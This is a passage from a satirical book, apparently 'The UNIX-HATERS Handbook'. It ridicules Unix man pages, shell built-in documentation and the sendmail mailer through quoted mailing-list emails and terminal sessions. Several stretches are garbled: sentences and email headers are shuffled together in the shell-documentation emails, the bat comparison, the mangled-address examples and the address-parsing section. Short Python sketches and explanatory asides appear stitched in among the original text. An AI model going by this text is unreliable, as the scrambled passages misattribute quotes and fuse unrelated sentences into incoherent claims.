System V default format sucks. What the hell is going on?

michael: ls -d */cat3
g_man/cat3 p_man/cat3
michael: cd g_man/cat3
michael: ls
standard
michael: cd standard
michael: ls

I luck out. The files scroll off the screen, due to rampant SysV-ism of /bin/ls, and I see a directory named "standard" at the top of my xterm, which the files have again scrolled off the screen…

michael: ls lock*
No match.
michael: cd standard
michael: ls lock*
lockf.z

Oh, goody. It's compress(1)ed. Why is it compressed, and not stored as plain text? Did SGI think that the space they would save by compressing the man pages would make up for the enormous RISC binaries that they have lying around? Anyhow, might as well read it while I'm here.

michael: zcat lockf
lockf.Z: No such file or directory
michael: zcat lockf.z
lockf.z.Z: No such file or directory

Sigh. I forget exactly how inflexible zcat is.

michael: cp lockf.z ~/lockf.Z
michael: cd
michael: zcat lockf | more
lockf.Z: not in compressed format

It's not compress(1)ed? Growl. The least they could do is make it easily people-readable.

So I edit my .cshrc to add /usr/catman to my already-huge MANPATH and try again:

michael: source .cshrc
michael: man lockf

And, sure enough, it's there… and the swelling, itching brain shakes with spasms and strange convulsions.

No Manual Entry for "Well Thought-Out"

The Unix approach to on-line documentation works fine if you are interested in documenting a few hundred programs and commands that you, for the most part, can keep in your head anyway. It starts to break down as the number of entries in the system approaches a thousand, written by hundreds of authors spread over the continent.

Date: Thu, 20 Dec 90 3:20:13 EST
From: Rob Austein <sra@lcs.mit.edu>
To: UNIX-HATERS
Subject: Don't call your program "local" if you intend to document it
It turns out that there is no way to obtain a manual page for a program called "local," even if you explicitly specify the manual section number (great organizational scheme, huh?). If you try, you get the following message:

sra@mintaka> man 8 local
But what do you want from section local?

Shell Documentation

The Unix shells have always presented a problem for Unix documentation writers: the shells have built-in commands. That these commands look like real commands is an illusion. Should built-ins be documented on their own man pages or on the man page for the shell? Traditionally, these programs have been documented on the shell page. This approach is logically consistent; after all, looking at the man page for sh or csh isn't cheating, since there is no while or if or set command. Unfortunately, this attitude causes problems for new users—the very people for whom documentation should be written.

For example, a user might hear that Unix has a "history" feature which saves them the trouble of having to retype a command that they have previously typed. To find out more about the "history" command, an aspiring novice might try:

% man history
No manual entry for history.

That's because "history" is a built-in shell command. There are many of them. Try to find a complete list. (Go ahead.)

Of course, perhaps it is better that each shell's built-ins are documented on the page of the shell, rather than their own page: different shells have commands that have the same names, but different functions. Imagine trying to write a "man page" for the set command. Such a man page would probably consist of a single line: "But which set command do you want?"

Date: Thu, 24 Sep 92 16:25:49 -0400
From: Systems Anarchist <clennox@ftp.com>
To: UNIX-HATERS
Subject: consistency is too much of a drag for Unix weenies

I recently had to help a frustrated Unix newbie with these gems:
stanford.mit. conflicting. David. He had never seen it documented anywhere. and sometimes neither. When David Chapman. Under the c-shell (the other ‘standard’ Unix shell). the set command sets option switches. 7 May 90 18:44:06 EST Robert E. but definitely no clue that another. a leading authority in the field of artificial intelligence.edu UNIX-HATERS Why don’t you just type “fg %emacs” or simply “%emacs”? Come on. Seastrom <rs@eddie.slb. you don’t have to go inventing imaginary lossage to complain about! <grin> The pitiful thing was that David didn’t know that you could simply type “%emacs” to restart a suspended Emacs job. David Chapman wasn’t the only one. there is so much lossage in Unix. ‘set’ sets shell variables.mit.’ you will get either one or the other definition of the command (depending on the whim of the vendor of that particular Unix system) but usually not both. Seastrom <rs@eddie. Mistakenly using the ‘set’ syntax for one shell under the other silently fails.edu> zvona@gang-of-four.com> Robert E. If you do a ‘man set. To top it off.50 Documentation? Under the Bourne shell (the ‘standard’ Unix shell). either. without any error or warning whatsoever. Robert Seastrom sent this helpful message to David and cc’ed the list: Date: From: To: Cc: Mon. (Most of the people who read early drafts of this book didn’t know either!) Chris Garrigues was angrier than most: Date: From: To: Cc: Subject: Tue. typing ‘set’ under the Bourne shell lists the shell variables! Craig Undocumented shell built-ins aren’t just a mystery for novice.edu> UNIX-HATERS Re: today’s gripe: fg %3 . 8 May 90 11:43 CDT Chris Garrigues <7thSon@slcs. complained to UNIX-HATERS that he was having a hard time using the Unix fg command because he couldn’t remember the “job numbers” used by the C-shell. definition exists. many people on UNIX-HATERS sent in e-mail saying that they didn’t know about these funky job-control features of the C-shell either.
Is this documented somewhere or do I have to buy a source license and learn to read C? "man fg" gets me the CSH_BUILTINS man page[s], and I've never been able to find anything useful in there. If I search this man page for "job" it doesn't tell me this anywhere. It does, however, tell me that if I type "% job &" that I can take a job out of the background and put it back in the background again. I know that this is functionality that I will use far more often than I will want to refer to a job by name.

This Is Internal Documentation?

Some of the larger Unix utilities provide their own on-line documentation as well. For many programs, the "on-line" docs are in the form of a cryptic one-line "usage" statement. Here is the "usage" line for awk:

% awk
awk: Usage: awk [-f source | 'cmds'] [files]

Informative, huh? More complicated programs have more in-depth on-line docs. Unfortunately, you can't always rely on the documentation matching the program you are running.

Date: 3 Jan 89 16:26:25 EST (Tuesday)
From: Reverend Heiny <Heiny.henr@Xerox.COM>
To: UNIX-HATERS
Subject: A conspiracy uncovered

After several hours of dedicated research, I have reached an important conclusion.

Unix sucks.

Now, this may come as a surprise to some of you, but it's true. This research has been validated by independent researchers around the world. More importantly, this is no two-bit suckiness we are talking here. This is major league. Big time Hooverism. Sucks with a capital S. I mean, take the following for example:

toolsun% mail
Mail version SMI 4.0 Sat Apr 9 01:54:23 PDT 1988  Type ? for help.
"/usr/spool/mail/chris": 3 messages 3 new
>N  1 chris  Thu Dec 22 15:49  19/643  editor saved "trash1"
 N  2 root   Tue Jan  3 10:35  19/636  editor saved "trash1"
 N  3 chris  Tue Jan  3 14:40  19/656  editor saved "/tmp/ma8"
& ?
Unknown command: "?"
&

What production environment, especially one that is old enough to drive, vote, and drink 3.2 beers, should reject the very commands that it tells you to enter? Why does the user guide bear no relationship to reality? Why do the commands have cryptic names that have no bearing on their function?

We don’t know what Heiny’s problem was; his bug seems to be fixed now. Or perhaps it just moved to a different application.

Date: Tuesday, September 29, 1992 7:47PM
From: Mark Lottor <mkl@nw.com>
To: UNIX-HATERS
Subject: no comments needed

fs2# add_client
usage: add_client [options] clients
       add_client -i|-p [options] [clients]
-i     interactive mode - invoke full-screen mode
[other options deleted for clarity]
fs2# add_client -i
Interactive mode uses no command line arguments

How to Get Real Documentation

Actually, the best form of Unix documentation is frequently running the strings command over a program’s object code. Using strings, you can get a complete list of the program’s hard-coded file names, environment variables, undocumented options, obscure error messages, and so forth. For example, if you want to find out where the cpp program searches for #include files, you are much better off using strings than man:

next% man cpp
No manual entry for cpp.
next% strings /lib/cpp | grep /
/lib/cpp-precomp
/lib/
/usr/local/lib/
/cpp
%s/%s
/lib/%s/specs
next%

Hmm… Excuse us for one second:

% ls /lib
cpp*            gcrt0.o         libsys_p.a
cpp-precomp*    i386/           libsys_s.a
crt0.o          m68k/           posixcrt0.o

Silly us. NEXTSTEP’s /lib/cpp calls /lib/cpp-precomp. You won’t find that documented on the man page either:

next% man cpp-precomp
No manual entry for cpp-precomp.

For Programmers, Not Users

Don’t blame Ken and Dennis for the sorry state of Unix documentation today. When the documentation framework was laid down, standards for documentation that were prevalent in the rest of the computer industry didn’t apply. Traps, bugs, and potential pitfalls were documented more frequently than features, because the people who read the documents were, for the most part, the people who were developing the system. For many of these developers, the real function of Unix’s “man” pages was as a place to collect bug reports. The notion that Unix documentation is for naive or merely inexpert users, programmers, and system administrators is a recent
invention, and it hasn’t been very successful, because of the underlying Unix documentation model established in the mid 1970s. The Unix world acknowledges, but it does not apologize for, this sorry state of affairs. Life with Unix states the Unix attitude toward documentation rather matter-of-factly:

    The best documentation is the UNIX source. After all, this is what
    the system uses for documentation when it decides what to do next!
    The manuals paraphrase the source code, often having been written
    at different times and by different people than who wrote the code.
    Think of them as guidelines. Sometimes they are more like wishes…

Nonetheless, it is all too common to turn to the source and find options and behaviors that are not documented in the manual. Sometimes you find options described in the manual that are unimplemented and ignored by the source. And that’s for user programs. Inside the kernel, things are much worse. Until very recently, there was simply no vendor-supplied documentation for writing new device drivers or other kernel-level functions. People joked “anyone needing documentation to the kernel functions probably shouldn’t be using them.”

The real story was, in fact, far more sinister. The kernel was not documented because AT&T was protecting this sacred code as a “trade secret.” Anyone who tried to write a book that described the Unix internals was courting a lawsuit.

The Source Code Is the Documentation

As fate would have it, AT&T’s plan backfired. In the absence of written documentation, the only way to get details about how the kernel or user commands worked was by looking at the source code. As a result, Unix sources were widely pirated during the operating system’s first 20 years. Consultants, programmers, and system administrators didn’t copy the source code because they wanted to compile it and then stamp out illegal Unix clones: they made their copies because they needed the source code for documentation. Copies of Unix source code filtered out of universities to neighboring high-tech companies. Sure it was illegal, but it was justifiable felony: the documentation provided by the Unix vendors was simply not adequate.

This is not to say that the source code contained worthwhile secrets. Anyone who had both access to the source code and the inclination to read it soon found themselves in for a rude surprise:

/* You are not expected to understand this */

Although this comment originally appeared in the Unix V6 kernel source code, it could easily have applied to any of the original AT&T code: register variables with names like p, pp, and ppp being used for multitudes of different purposes in different parts of a single function; comments like “this function is recursive,” as if recursion is a difficult-to-understand concept. The fact is, AT&T’s institutional attitude toward documentation for users and programmers was indicative of a sloppy attitude toward writing in general, and writing computer programs in particular. It’s easy to spot the work of a sloppy handyman: you’ll see paint over cracks, patch over patch, everything held together by chewing gum and duct tape. Face it: it takes thinking and real effort to re-design and build something over from scratch.

Date: Thu, 17 May 90 14:43:28 -0700
From: David Chapman <zvona@gang-of-four.stanford.edu>
To: UNIX-HATERS

I love this. From man man:

    DIAGNOSTICS
    If you use the -M option, and name a directory that does not
    exist, the error message is somewhat misleading. Suppose the
    directory /usr/foo does not exist. If you type:

        man -M /usr/foo ls

    you get the error message “No manual entry for ls.” You should
    get an error message indicating that the directory /usr/foo does
    not exist.

Writing this paragraph must have taken more work than fixing the bug would have.
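The “run strings over the binary” trick that this chapter leans on as the documentation of last resort is easy to approximate. The sketch below is a hypothetical miniature of what strings(1) conventionally does (print runs of at least four printable ASCII characters); the sample “binary” blob and the minimum-run length are invented for illustration, not taken from any real program.

```python
import re

def strings(data: bytes, min_len: int = 4) -> list[str]:
    """Rough approximation of Unix strings(1): extract runs of
    printable ASCII at least min_len characters long."""
    return [m.decode("ascii")
            for m in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)]

# A fake "binary": path strings embedded among non-text bytes.
blob = b"\x7fELF\x00/lib/cpp-precomp\x00\x01\x02/usr/local/lib/\x00ok"
paths = [s for s in strings(blob) if "/" in s]
```

Piping the result through a filter for “/”, as in `strings /lib/cpp | grep /`, is exactly the `paths` comprehension above: it keeps only the extracted strings that look like file paths.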
Unix Without Words: A Course Proposal

Date: Fri, 24 Apr 92 12:58:28 PST
From: cj@eno.corp.sgi.com (C J Silverio)
Organization: SGI TechPubs
Newsgroups: talk.bizarre1
Subject: Unix Without Words

[During one particularly vitriolic flame war about the uselessness of documentation, I wrote the following proposal. I never posted it, because I am a coward… I finally post it here, for your edification.]

1 Forwarded to UNIX-HATERS by Judy Anderson.

Unix Ohne Worter

Well! I’ve been completely convinced by the arguments presented here on the uselessness of documentation. In fact, I’ve become convinced that documentation is a drug, and that my dependence on it is artificial. I can overcome my addiction, with professional help.

And what’s more, I feel morally obliged to cease peddling this useless drug for a living. I’ve decided to go back to math grad school to reeducate myself, and get out of this parasitic profession.

Perhaps it just reveals the depth of my addiction to documentation, but I do see the need for SGI to ship one document with our next release. I see this book as transitional only. We can eliminate it for the following release.

Here’s my proposal:

TITLE: “Unix Without Words”
AUDIENCE: The Unix novice.
OVERVIEW: Gives a general strategy for approaching Unix without documentation. Presents generalizable principles useful for deciphering any operating system without the crutch of documentation.

CONTENTS:
INTRO:   overview of the ‘no doc’ philosophy
         why manuals are evil
         why man pages are evil
         why you should read this book despite the above
         “this is the last manual you'll EVER read!”

CHAP 1:  guessing which commands are likely to exist

CHAP 2:  guessing what commands are likely to be called
         unpredictable acronyms the Unix way
         usage scenario: “grep”

CHAP 3:  guessing what options commands might take
         deciphering cryptic usage messages
         usage scenario: “tar”

CHAP 4:  guessing when order is important
         usage scenario: SYSV “find”

CHAP 5:  figuring out when it worked: silence on success
         recovering from errors

CHAP 6:  the oral tradition: your friend

CHAP 7:  obtaining & maintaining a personal UNIX guru
         feeding your guru
         keeping your guru happy
         the importance of full news feeds
         why your guru needs the fastest machine available
         free Coke: the elixir of your guru’s life
         maintaining your guru’s health
         when DO they sleep?
         troubleshooting: when your guru won’t speak to you
         identifying stupid questions
         safely asking stupid questions

CHAP 8:  accepting your stress
         coping with failure
(Alternatively, maybe only chapters 6 & 7 are really necessary. Yeah, that’s the ticket: we’ll call it The Unix Guru Maintenance Manual.)
4  Mail
Don’t Talk to Me, I’m Not a Typewriter!

    Not having sendmail is like not having VD.
    —Ron Heiby
    Former moderator, comp.newprod

Date: Thu, 26 Mar 92 21:40:13 -0800
From: Alan Borning <borning@cs.washington.edu>
To: UNIX-HATERS
Subject: Deferred: Not a typewriter

When I try to send mail to someone on a Unix system that is down (not an uncommon occurrence), sometimes the mailer gives a totally incomprehensible error indication, viz.:

    Mail Queue (1 request)
    --QID--  --Size--  -----Q-Time-----  --------Sender/Recipient--------
    AA12729       166  Thu Mar 26 15:43  borning
             (Deferred: Not a typewriter)
                                         bnfb@csr.uvic.ca

What on earth does this mean? Of course a Unix system isn’t a typewriter! If it were, it would be up more often (with a minor loss in functionality).
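For the curious, the baffling “(Deferred: Not a typewriter)” has a mundane mechanical explanation: “Not a typewriter” was the classic C-library text for the errno value ENOTTY, and the mailer is simply printing whatever message matches the errno left over from some unrelated failed system call. The sketch below models that behavior; the CLASSIC_ERRLIST wording is the historical phrasing (modern C libraries render ENOTTY as “Inappropriate ioctl for device”), and the function is an illustration of the mechanism, not the mailer’s actual code.

```python
import errno
import os

# Historical wording: early Unix C libraries rendered ENOTTY as
# "Not a typewriter"; modern ones say "Inappropriate ioctl for device".
CLASSIC_ERRLIST = {errno.ENOTTY: "Not a typewriter"}

def deferral_message(err: int) -> str:
    """Model of the mailer's behavior: blindly report the message for
    whatever errno the last failed system call happened to leave."""
    text = CLASSIC_ERRLIST.get(err, os.strerror(err))
    return "(Deferred: %s)" % text

# An ioctl() on something that isn't a terminal fails with ENOTTY,
# so the queue listing reads "(Deferred: Not a typewriter)".
```

The error has nothing to do with typewriters and everything to do with a program reporting an errno it did not set itself.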
Sendmail: The Vietnam of Berkeley Unix

Before Unix, electronic mail simply worked. The administrators at different network sites agreed on a protocol for sending and receiving mail, and then wrote programs that followed the protocol. Locally, they created simple and intuitive systems for managing mailing lists and mail aliases. Seriously: how hard can it be to parse an address, resolve aliases, and either send out or deliver a piece of mail? Quite hard, actually, if your operating system happens to be Unix.

Date: Wed, 15 May 1991 14:08-0400
From: Christopher Stacy <CStacy@stony-brook.scrc.symbolics.com>
To: UNIX-HATERS
Subject: harder!faster!deeper!unix

Remember when things like netmail used to work? With UNIX, people really don’t expect things to work anymore. I mean, things sorta work, most of the time, and that’s good enough, isn’t it? What’s wrong with a little unreliability with mail? So what if you can’t reply to messages? So what if they get dropped on the floor?

The other day, I tried talking to a postmaster at a site running sendmail. You see, whenever I sent mail to people at his site, the headers of the replies I got back from his site came out mangled, and I couldn’t reply to their replies. It looked like maybe the problem was at his end—did he concur? This is what he sent back to me:

    Date: Mon, 13 May 1991 21:28 EDT
    From: silv@upton.scrc.symbolics.com (Stephen J. Silver)1
    To: mit-eddie!STONYBROOK.SCRC.SYMBOLICS.COM!CStacy@EDDIE.MIT.EDU 2
    Subject: Re: mangled headers

    No doubt about it. Our system mailer did it. I mean, what is
    wrong? Just does not look nice? I am not a sendmail guru and do
    not have one, and given the time I have, Mail sorta works, most
    of the time. If you got it, how did you know? If you got it, that
    is great. If not, Good Luck.

    Stephen Silver

1 Pseudonym.
2 Throughout most of this book, we have edited gross mail headers for clarity. But on this message, we decided to leave this site’s sendmail’s handiwork in all its glory.—Eds.

Despite its problems, sendmail was better than the Unix mail program that it replaced: delivermail. Sendmail was written by Eric Allman at the University of Berkeley in 1983 and was included in the Berkeley 4.2 Unix distribution as BSD’s “internetwork mail router.” The program was developed as a single “crossbar” for interconnecting disparate mail networks. In its first incarnation, sendmail interconnected UUCP, BerkNet and ARPANET (the precursor to Internet) networks.

Sendmail is the standard Unix mailer, and it is likely to remain the standard Unix mailer for many, many years. Although other mailers (such as MMDF and smail) have been written, none of them simultaneously enjoy sendmail’s popularity or widespread animosity.

A Harrowing History

Date: Tue, 12 Oct 93 10:31:48 -0400
From: dm@hri.com
To: UNIX-HATERS
Subject: sendmail made simple

I was at a talk that had something to do with Unix. Fortunately, I’ve succeeded in repressing all but the speaker’s opening remark:

    I’m rather surprised that the author of sendmail is still
    walking around alive.

The thing that gets me is that one of the arguments that landed Robert Morris, author of “the Internet Worm,” in jail was all the sysadmins’ time his prank cost. Yet the author of sendmail is still walking around free without even a U (for Unixery) branded on his forehead.

Writing a mail system that reliably follows protocol is just not all that hard. I don’t understand why, in 20 years, nobody in the Unix world has been able to get it right once. Instead we have sendmail.

In his January 1983 USENIX paper, Allman defined eight goals for sendmail:

1. Sendmail had to be compatible with existing mail programs.
2. Sendmail had to be reliable, never losing a mail message.

3. Existing software had to do the actual message delivery if at all possible.

4. Sendmail had to work in both simple and extremely complex environments.

5. Sendmail’s configuration could not be compiled into the program, but had to be read at startup.

6. Sendmail had to let various groups maintain their own mailing lists and let individuals specify their own mail forwarding, without having individuals or groups modify the system alias file.

7. Each user had to be able to specify that a program should be executed to process incoming mail (so that users could run “vacation” programs).

8. Network traffic had to be minimized by batching addresses to a single host when at all possible.

(An unstated goal in Allman’s 1983 paper was that sendmail also had to implement the ARPANET’s nascent SMTP (Simple Mail Transport Protocol) in order to satisfy the generals who were funding Unix development at Berkeley.)

Sendmail was built while the Internet mail handling systems were in flux; it had to be programmable so that it could handle any possible changes in the standards. That was great in 1985. In 1994, the Internet mail standards have been decided upon and such flexibility is no longer needed. Nevertheless, all of sendmail’s rope is still there, ready to make a hangman’s knot, should anyone have a sudden urge. Delve into the mysteries of sendmail’s unreadable sendmail.cf files and you’ll discover ways of rewiring sendmail’s insides so that “@#$@$^%<<<@#) at @$%#^!” is a valid e-mail address.

Sendmail is one of those clever programs that performs a variety of different functions depending on what name you use to invoke it. Sometimes it’s the good ol’ sendmail; other times it is the mail queue viewing program or the aliases database-builder. In 1994, “Sendmail Revisited” admits that bundling so much functionality into a single program was probably a mistake: certainly the SMTP server, mail queue handler, and alias database management system should have been handled by different programs (no doubt carrying through on the Unix “tools” philosophy).
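The “different functions depending on what name you use to invoke it” trick is simple to demonstrate. Historically, mailq and newaliases were links to the sendmail binary, which inspected its own invocation name; the sketch below shows the general technique. The personality strings and table are illustrative stand-ins, not sendmail’s actual behavior.

```python
import os

# mailq and newaliases are traditionally links to the sendmail binary;
# the program decides what to do by looking at the name it was run as.
PERSONALITIES = {
    "newaliases": "rebuild the alias database",
    "mailq": "show the mail queue",
}

def personality(argv0: str) -> str:
    """Choose a behavior from the program name (illustrative strings).
    Anything unrecognized falls through to normal mail delivery."""
    return PERSONALITIES.get(os.path.basename(argv0), "deliver mail")
```

In a real program the dispatch would key off `sys.argv[0]`; the point is only that one binary installed under several names can behave as several tools.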
So I decided to upgrade to the latest version of Berzerkly Sendmail (8.5) which reputedly does a very good job of not adhering to the standard in question. and that we have standards for a reason. Allman.
I can come up with tons of better answers to that one. • Have you ever watched a bat fly? Have you ever watched Sendmail process a queue full of undelivered mail? QED. To wit: • The common North American brown bat’s diet is composed principally of bugs. • Sendmail and bats both suck. a principal ingredient in things that blow up in your face. making “eep eep” noises which are incomprehensible to the average person. it is really a rather friendly and intelligent beast. like a bat.$*?$+ R<$+>$+. Especially because it’s so patently wrong. Friendly and intelligent? Feh. although sendmail has a reputation for being scary.$*?$+ R<$+>:$+ R<$=X$-.$4 Change do user@domain . • Both bats and sendmail are held in low esteem by the general public. Sendmail is a software package which is composed principally of bugs. • Bat guano is a good source of potassium nitrate. domain $@<$1$2.UUCP>!?$+ R<$=X$->!?$+ R<$+>$+?$+ R<$+. and he picked the bat because it appealed to him the most.$+>$=Y$+ $:<$1>$2$3?$4$5 Mark user portion. <$1>$2!$3!$4?$5 is inferior to @ <$1>$2:$3?$4 Change src rte to % path <$1>. Sendmail likewise requires mystical incantations such as: R<$+>$*$=Y$~A$* R<$+>$*!$+.$2>. • Sendmail maintainers and bats both tend to be nocturnal creatures.66 Mail three pictures. Like Sendmail. The fun answer is that. • Bats require magical rituals involving crosses and garlic to get them to do what you want.$2 Change % to @ for immed.UUCP>!$3 Return UUCP $@<$1$2>!$3 Return unqualified <$1>$2$3 Remove '?' $@<$1. • Sendmail and bats both die quickly when kept in captivity.
Subject: Returned Mail: User Unknown 67 • Farmers consider bats their friends because of the insects they eat. Stay tuned for the . Decompose the address into two parts: a name and a host (much as the U. a street+number.22 penetration test results! —Rob Subject: Returned Mail: User Unknown A mail system must perform the following relatively simple tasks each time it receives a message in order to deliver that message to the intended reciepient: 1. but I think you get the idea. Figure out which part of the message is the address and which part is the body. I could go on and on. 2.S. 3. send the message to the specified host. Farmers consider Sendmail their friend because it gets more collegeeducated people interested in subsistence farming as a career. Postal System decomposes addresses into a name.) If the destination host isn’t you. . and town+state.
media.edu> Sidewalk obstruction msgs@media.media. It’s not so easy for Unix. 16 Oct 91 17:33:07 -0400 Thomas Lawrence <thomasl@media-lab. will.mit.edu> msgs@media.front.mit. This is easy for humans.building. and that the body of the message is about some logs on the sidewalk outside the building.mit.edu Sidewalk obstruction The logs obstructing the sidewalk in front of the building will be used in the replacement of a collapsing manhole. Otherwise.mit.be. They will be there for the next two to three weeks.in.media.the.of.68 Mail 4.mit. We have no trouble figuring out that this message was sent from “Thomas Lawrence. 16 Oct 91 17:29:01 -0400 Thomas Lawrence <thomasl@media-lab. STEP 1: Figure out what is address and what is body.sidewalk.in.the@media-lab.edu The@media-lab.the.obstructing.” is meant for the “msgs” mailing list which is based at the MIT Media Lab. which manages to produce: Date: From: Subject: To: Cc: Wed.used.media. take the following message: Date: From: To: Subject: Wed. logs.edu.edu On occasion. Sendmail manages to blow every step of the process. use the name to figure out which user or users the message is meant for. For example. sendmail has been known to parse the entire body of a message (sometimes backwards!) as a list of addresses: .mit. and put the message into the appropriate mailboxes or files.
fr tel:76 57 46 68 (33)> Apparently-To: <PS:I’ll summarize if interest. Unfortunately.symbolics.EDU> Apparently-To: <Thanks in advance@Neon.com> UNIX-HATERS Mailer error of the day. When Joe Smith on machine A wants to send a message to Sue Whitemore on machine B. maybe users wouldn’t have been so flagrant in the addresses they compose.EDU> Apparently-To: <for temporal logics.@Neon.scrc. . Maybe netmail would work reliably once again. Just the same. The at-sign (@) is for routing on the Internet. At times. Maybe they would demand that their system administrators configure their mailers properly.etc. If sendmail weren’t so willing to turn tricks on the sender’s behalf.Stanford.uucp.Stanford. 8 Jul 1992 11:01-0400 Judy Anderson <yduJ@stony-brook. since sendmail itself is the victim of multiple Unix “standards.Subject: Returned Mail: User Unknown 69 Date: Thu.Stanford. and percent (%) is just for good measure (for compatibility with early ARPANET mailers).EDU> STEP 2: Parse the address.EDU> Apparently-To: <I’m interested in gentzen and natural deduction style axiomatizations@Neon.EDU Comment: Redistributed from CS. It’s up to sendmail to parse this nonsense and try to send the message somewhere logical.Comments and references are welcomed. 13 Sep 90 08:48:06 -0700 From: MAILER-DAEMON@Neon. no matter where you were sending the mail to or receiving it from.Stanford.Stanford. sendmail is partially responsible for promulgating the lossage. it has (at least) three separation characters: “!”. “@”.Stanford. the exclamation point (!) (which for some reason Unix weenies insist on calling “bang”) is for routing on UUCP. and “%”.EDU Apparently-To: <Juan ECHAGUE e-mail:jve@lifia.imag.EDU> Apparently-To: <Juan@Neon. Parsing an electronic mail address is a simple matter of finding the “standard” character that separates the name from the host.@Neon.Stanford. it’s hard not to have pity on sendmail. sometimes sendmail goes too far: Date: From: To: Subject: Wed. 
he might generate a header such as Sue@bar!B%baz!foo.” Of course. since Unix believes so strongly in standards.
But sendmail isn’t that smart: it needs to be specifically told that John Doe. while it is in the processing of compiling its alias file into binary format. like “it’s from the dark ages of computing.” “John Q.” but we can’t: alias files worked in the dark ages of computing. So what did the Unix mailer do with this address when I tried to reply? Why it turned “at” into “@” and then complained about no such host! Or was it invalid address format? I forget. Sendmail not only has a hopeless file format for its alias database: many versions commonly in use refuse to deliver mail or perform name resolution. such as Carnegie Mellon University’s Andrew System.” electronic mail systems handle multiple aliases for the same person. which specifies the mapping from the name in the address to the computer user. . John Q. up-to-date alias files that are riddled with problems. sendmail is a little unclear on the concept. Alias files are rather powerful: they can specify that mail sent to a single address be delivered to many different users. Kim. Just as the U. Doe. the name “QUICHE-EATERS” might be mapped to “Anton. Doe are actually all the same person. We’d like to say something insulting. Mailing lists are created this way. do this automatically. …Or perhaps sendmail just thinks that Judy shouldn’t be sending e-mail to Austria. Doe. For example. and J.at” domain. there are so many different ways to lose. Postal Service is willing to deliver John Doe’s mail whether it’s addressed to “John Doe. Seems I got mail from someone in the “.S. This is done with an alias file. and Bruce. Figure 1 shows an excerpt from the sendmail aliases file of someone who maintained systems then and is forced to use sendmail now. and its alias file format is a study in misdesign. Unfortunately.70 Mail I had fun with my own mailer-error-of-the-day recently.” or “J. Advanced electronic mail systems. STEP 3: Figure out where it goes. 
Aliases files are a natural idea and have been around since the first electronic message was sent. Doe. It is sendmail’s modern.” Sending mail to QUICHE-EATERS then results in mail being dropped into three mailboxes.
###############################################################
#
# READ THESE NOTES BEFORE MAKING CHANGES TO THIS FILE: thanks!
#
# Since aliases are run over the yellow pages, you must issue the
# following command after modifying the file:
#
#     /usr/local/newaliases
#
# (Alternately, type m-x compile in Emacs after editing this file.)
# [Note this command won't -necessarily- tell one whether the
# mailinglists file is syntactically legal -- it might just silently
# trash the mail system on all of the suns.]
# WELCOME TO THE WORLD OF THE FUTURE
#
# Special note: Make sure all final mailing addresses have a host
# name appended to them.  If they don't, sendmail will attach the
# Yellow Pages domain name on as the implied host name, which is
# incorrect.  Thus, if you receive your mail on wheaties, and your
# username is johnq, use "johnq@wh" as your address.  It
# will cause major lossage to just use "johnq".  One other point to
# keep in mind is that any hosts outside of the local
# domain must have fully qualified host names.  Thus, "xx" is not a
# legal host name; you must use "xx.lcs.mit.edu".
# WELCOME TO THE WORLD OF THE FUTURE
#
# Special note about comments:
# Unlike OZ's MMAILR, you -CANNOT- stick a comment at the end of a
# line by simply prefacing it with a "#".  The mailer (or newaliases)
# will think that you mean an address which just so happens to have
# a "#" in it, rather than interpreting it as a comment.  This means,
# essentially, that you cannot stick comments on the same line as
# any code.  This also probably means that you cannot stick a comment
# in the middle of a list definition (even on a line by itself) and
# expect the rest of the list to be properly processed.
# WELCOME TO THE WORLD OF THE FUTURE
#
# Special note about large lists:
# It seems from empirical observation that any list defined IN THIS
# FILE with more than fifty (50) recipients will cause newaliases to
# say "entry too large" when it's run.  Adding the fifty-first
# recipient to the list will cause this error.  It doesn't tell you
# -which- list is too big, but if you've only been editing one, you
# have some clue.  [The actual problem is that this file is stored in
# dbm(3) format for use by sendmail.  This format limits the length
# of each alias to the internal block size (1K), unlike other
# systems, which seem to have much larger or infinite numbers of
# recipients allowed.]  The workaround is to use :include files as
# described elsewhere.
# WELCOME TO THE WORLD OF THE FUTURE
#
###############################################################

FIGURE 1. Excerpts From A sendmail alias file

Date: Thu, 11 Apr 91 13:00:22 EDT
From: Steve Strassmann <straz@media-lab.mit.edu>
To: UNIX-HATERS
Subject: pain, death, and disfigurement
Sometimes, sendmail simply gets confused and can’t figure out where to deliver mail. On other occasions, sendmail will happily tell you your addressee is unknown. But only sometimes. You see, newaliases processes /usr/lib/aliases like so much horse meat, bone, skin, and all. It will merrily ignore typos, choke on perilous whitespace, do whatever it wants with comments except treat them as comments, report practically no errors or warnings, and then treat the result as gospel. How could it do otherwise? That would require it to actually comprehend what it reads, and Unix just isn’t up to the task.

If you send mail to an alias like ZIPPER-LOVERS which is at the end of the file, while it’s still gurgitating on ACME-CATALOG-REQUEST, sendmail just silently throws the mail away. Obviously, you can send mail to a mailing list, but not if someone else just happens to be running newaliases at the moment. I guess it would be too hard for the mailer to actually wait for this sausage to be completed before using it; it would be trivial, but evidently Unix cannot afford to keep the old, usable version around while the new one is being created. Unix must be appreciated at just the right moment, like a rare fungus. As the alias list is pronounced dead on arrival, the new mail database has some new bugs, and the old version, the last known version that actually worked, is simply lost forever. And the person who made the changes is not warned of any bugs. And the person who sent mail to a valid address gets it bounced back. Few people can complain about this particular sendmail mannerism, because few people know that the mail has been lost.

STEP 4: Put the mail into the correct mailbox. Don’t you wish? Practically everybody who has been unfortunate enough to have their messages piped through sendmail had a special message sent to the wrong recipient. Usually these messages are very personal, and somehow uncanningly sent to the precise person for whom receipt will cause the maximum possible damage.

Because Unix lies in so many ways, and because sendmail is so fragile, it is virtually impossible to debug this system when it silently deletes mail:
Date: Tue, 30 Apr 91 02:11:58 EDT
From: Steve Strassmann <straz@media-lab.mit.edu>
To: UNIX-HATERS
Subject: Unix and parsing

You know, some of you might be saying, why does this straz guy send so much mail to UNIX-HATERS? How does he come up with new stuff every day, sometimes twice a day? Why is he so filled with bile? To all these questions there’s a simple answer: I use Unix. Oh no, hell, I said it.

Like today, solving another unrelated Unix problem, I try “ps -ef” to look at some processes. Sure enough, my processes are there, all right, but mine aren’t owned by “straz”; the owner is this guy named “000000058.” Time to look in /etc/passwd. Right there, on line 3 of the password file, is this new user, followed by (horrors!) a blank line. Followed by all the other entries, in their proper order. A blank line, plain to you or me, but not to Unix. You see, Unix knows parsing like Dan Quayle knows quantum mechanics: whoever was fetching my name on behalf of ps can’t read past a blank line, so it decided “straz” simply wasn’t there.

